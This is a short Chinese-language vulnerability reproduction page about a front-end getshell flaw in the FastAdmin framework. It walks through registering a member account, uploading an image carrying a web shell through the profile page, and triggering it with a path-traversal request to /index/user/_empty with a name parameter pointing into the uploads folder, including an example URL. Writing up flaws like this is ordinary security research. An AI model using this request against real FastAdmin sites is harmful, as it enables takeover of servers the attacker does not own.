您当前的位置:首页 > 计算机 > 安全防护

Fastadmin前台Getshell漏洞复现

时间:10-25来源:作者:点击数:

一、简介

FastAdmin是一款基于ThinkPHP5+Bootstrap开发的极速后台开发框架。FastAdmin基于Apache2.0开源协议发布,目前被广泛应用于各大行业应用后台管理。

二、漏洞复现

注:在Linux下,通过这种方法会失效,因为在 /public 路径下不存在 user 目录

1、登录前台会员中心,注册一个账户

2、使用注册的账户登录,点击会员中心"-》"个人资料"处,上传一个jpg图片马

3、构造POC,GET /index/user/_empty?name=../../public/uploads/路径.jpg,访问http://xx.xx.xx.xx/index.php/index/user/_empty?name=../../public/uploads/20200924/500309dcf5c48dd851a218caa0f65566.jpg

方便获取更多学习、工作、生活信息请关注本站微信公众号城东书院 微信服务号城东书院 微信订阅号
推荐内容
相关内容
栏目更新
栏目热门